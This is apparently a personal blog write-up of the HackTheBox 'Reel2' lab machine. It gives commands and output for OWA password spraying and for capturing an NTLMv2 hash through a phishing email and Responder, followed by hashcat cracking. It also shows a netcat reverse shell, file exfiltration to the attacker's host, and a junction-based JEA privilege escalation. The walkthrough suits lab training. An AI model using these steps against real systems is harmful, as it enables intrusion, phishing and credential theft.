Posts Hackthebox Reel2 writeup
Post
Cancel

Hackthebox Reel2 writeup

Introduction@Reel2:~$

Column Details
Name Reel2
IP 10.10.10.210
Points 40
Os Windows
Difficulty Hard
Creator cube0x0
Out On 03 Oct 2020

Summary

  • Nmap shows the 3 Ports open.
  • Gather all theuser name in a txt file.
  • Valid login Creds Obtianed
  • login to OWA in https://10.10.10.210/OWA
  • Found k.svensson hash with help of Phising
  • Cracking the obtained ntml hash and get the password kittycat1
  • Login to the machine with the PSSession
  • Getting user.txt
  • looking at the 000003.log the password for the jea_test_account is enumerated
  • Found the password of jea_test_account In log file
  • Looking at the basic jae_test_account.psrc and .pssc the Check-File commad loads if the contents are fom the "C:\ProgramData".
  • Create a Symlink
  • Using Check-File command to enumerate.
  • Get root.txt

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #nmap -sC -sV -oA nmap/result 10.10.10.210
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-10 09:48 EDT
Nmap scan report for 10.10.10.210
Host is up ( latency).
Not shown: 991 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: 403 - Forbidden: Access is denied.
443/tcp  open  ssl/https?
|_ssl-date: 2020-10-10T04:27:32+00:00; -9h23m25s from scanner time.
6001/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6002/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6004/tcp open  ncacn_http Microsoft Windows RPC over HTTP 1.0
6005/tcp open  msrpc      Microsoft Windows RPC
6006/tcp open  msrpc      Microsoft Windows RPC
6007/tcp open  msrpc      Microsoft Windows RPC
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.32)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.32
|_http-title: Welcome | Wallstant
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -9h23m25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address ( host up) scanned in 213.23 seconds
                                                                

So basically Three ports are opened 80:http and 443:https 8080:http-proxy

Port-80

Enumerating http But He Said 403-Forbidden

Port-80

Enumerating HTTPS .

Port-80

Let's use gobuster to find Directories

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.210
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/10 10:04:31 Starting gobuster
===============================================================
/public (Status: 302)
/exchange (Status: 302)
/Public (Status: 302)
/rpc (Status: 401)
/owa (Status: 301)
                                                                

Let's Go to /owa First

Reel2.htb

Hmmm , a login page. Let's Try somesql injection

But nothing is work.

Port-8080

Reel2.htb

Lets Create A Account On SignUp Page.

Reel2.htb

Hmm.. In Home Page There Are So Many Users

Reel2.htb

Let's Gather All Users and Create A user.txt

Example:

1
2
3

sven
svensson
s.svensson
                                                                

Reel2.htb

If We See All Posts In The Posts Tab, The svensson user post gave us a hint This summer is so hot!

Reel2.htb

So, Let's Create A pass.txt with this hint.

1
2


┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
└──╼ #cat /usr/share/wordlists/rockyou.txt | grep Summer > pass.txt

                                                                

With the user.txt and pass.txt, lets bruteforce the OWA login

But We Don't bruteforce OWA login with wfuzz and hydra. we need to install a tool called SprayingToolkit.

Link : SprayingToolkit

But, Before Running this tool install the requirements of this tool.

1


pip3 install -r requirements.txt

                                                                

Now, Let's run the tool

1


python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01

                                                                

terminal

and after a couple of minutes we got the username and password.

terminal

  • Username = s.svensson
  • Password = Summer2020
  • Let's Login With This credentials on port 443

    Reel2.htb

    Hmm, site is on another language. Let's open it in chromium so we will understand what's going on.

    Reel2.htb

    Now I understand what's going on here it's a mail server i think we need to do some Phising stuff.

    If you don't known about that here is an interesting article.

    Link : NetNTLMv2 hash stealing using Outlook

    Reel2.htb

    So what we can do now compiling a new message

  • 1. click on New message.
  • Reel2.htb

    2. Select all user with Control+A then click on To button on bottom. So this will send our email to each and every user .

    Reel2.htb

    3. Give the subject as you wish and in the body enter your htb ip like http://10.10.XX.XX

    Reel2.htb

    Important : Before Sending this email start your responder.

    1
    
    
    
    responder -I tun0
    
                                                                    

    Reel2.htb

    Boom, After couple of minutes we get the response back.

    Reel2.htb

    But first we need to crack this hash. But first identify what type of hash is this.

    Reel2.htb

    So Now we known this is NTLMv2 Hash

  • Let's check it on hashcat example hashes
  • Link : Example hashes

    Reel2.htb

    So Now we known this hash is a crackable hash. So Let's Crack it

    1
    
    
    hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
                                                                    

    And we crack the hash.

    Reel2.htb

    username = k.svensson
    password = kittycat1

    Evil-WinRm is not work at this situation because port 5985 is not open.

    So we using Linux Powershell to login.

    But First Install powershell for Linux

    1
    2
    
    
    sudo apt install gss-ntlmssp
    sudo apt-get install powershell
                                                                    

    After installation you can access powershell with pwsh.

    Now, Let's login with pwsh.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    
    
    ┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
    └──╼ #pwsh
    PS /root/Desktop/HTB/reel2 > $offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
    
    PowerShell credential request
    Enter your credentials.
    Password for user k.svensson: *********
    
    PS /root/Desktop/HTB/reel2 > Enter-PSSession $offsec_session
    [10.10.10.210]: PS>
                                                                    

    Reel2.htb

    Now commands like dir, ls, cd, whoami wont work. $env:username and $env:domainname works.

    terminal

    We need to Execute powershell commands with the script block

    Link : behavior of Out-Default

    So we use &{ command }.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    
    
    [10.10.10.210]: PS> &{ cd ../Desktop }
    [10.10.10.210]: PS> &{ ls }
    
    
    Directory: C:\Users\k.svensson\Desktop
    
    
    Mode                LastWriteTime        Length Name                             
    ----                -------------        ------ ----                             
    -a----        7/30/2020  1:19 PM          2428 Sticky Notes.lnk                 
    -ar---        10/9/2020  7:21 AM            34 user.txt                         
    
    
    [10.10.10.210]: P> &{ type user.txt}
                                                                    

    terminal

    Now, let's change this interface to shell interface for that we need to transfer a nc.exe file and get a reverse shell.

    1. open a simple http server But i use apache2 service.

    terminal

    2. transfer nc.exe to the system

  • after running that open a netcat listener.
  • 1
    2
    3
    
    
    [10.10.10.210]: PS> &{ iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'}
    [10.10.10.210]: PS> &{ cd 'C:\Windows\System32\spool\drivers\color\'}
    [10.10.10.210]: PS> &{ ./nc.exe 10.10.xx.xx 9001 -e powershell.exe}
                                                                    

    terminal

    Let's check our netcat listener

    terminal

    Boom guys, we got the shell now we don't use this command &{ },

    Now the reverse shell is obtained. It's time for Enumeration.

    We Found nothing in our Enumeration proccess Let's check the log if anything interesting there.

    1
    2
    
    
    cd /
    dir /s /b *.log
                                                                    

    terminal

    they show us 000003.log file in our current user directory Let's get on that.

    terminal

    but when we use type command to see inside 000003.log file it's give me gibberish.

    So we need to get that file in our local machine.

    So we use nc.exe to transfer the file.

    1. open a listener in your local machine to get the file content.

    1
    
    
    nc -nvlp 1234 > 000003.log
                                                                    

    2. In the window reverse shell type this command.

    1
    2
    3
    
    
    PS C:\> cmd
    C:\> cd "C:\Windows\System32\spool\drivers\color\"
    nc.exe 10.10.XX.XX < "C:\users\k.svensson\appdata\roaming\stickynotes\Local Storage/leveldb\000003.log"
                                                                    

    terminal

    Let's check our netcat listener.

    terminal

    Let's use our strings command to see content in 000003.log file.

    terminal

    We got the username and password

  • username = jea_test_account
  • password = Ab!Q@vcg^%@#1
  • Privilege escalation

    Looking at the basic jae_test_account.psrc and .pssc the Check-File commad loads if the contents are fom the "C:\ProgramData".

    So what we can do we need to create a Symlink to ProgramData directory with Administrator directory.

    Important : be sure you run this command in PS

    1
    
    
    New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'
                                                                    

    terminal

    Now command will Executed successfully.

    So when we login with jea_test_account account we can access Administrator directory also.

    Now we need to login with jea_test_account account. So let's open a new terminal and type pwsh.

  • Run the command one by one.
  • 1
    2
    3
    4
    5
    6
    7
    
    
    ┌─[root@d3dsec]─[~/Desktop/HTB/reel2]
    └──╼ #pwsh
    PS /root/Desktop/HTB/reel2 > $username = "jea_test_account"
    PS /root/Desktop/HTB/reel2 > $password = ConvertTo-SecureString"Ab!Q@vcg^%@#1"-AsPlainText-Force
    PS /root/Desktop/HTB/reel2 > $cred = New-Object System.Management.Automation.PSCredential -ArgumentList  ($username, $password)
    PS /root/Desktop/HTB/reel2 > Enter-PSSession -Computer 10.10.10.210 -credential $cred -ConfigurationName jea_test_account -verbose -debug -Authentication Negotiate
    [10.10.10.210]: PS> Check-File C:\programdata\root\Desktop\root.txt
    
                                                                    

    terminal

    And we pwned it …….

    If u liked the writeup.Support a Student to Get the OSCP-Cert Donation for OSCP

    Resources

    Topic Url
    SprayingToolkit https://github.com/byt3bl33d3r/SprayingToolkit
    NetNTLMv2 hash https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook
    Example hashes https://hashcat.net/wiki/doku.php?id=example_hashes
    behavior of Out-Default https://stackoverflow.com/questions/18082746/can-you-change-the-......
    This post is licensed under CC BY 4.0

    Hackthebox Jewel writeup

    Fortress Reel2 writeup

    © 2020 Dedinfosec . All rights reserved.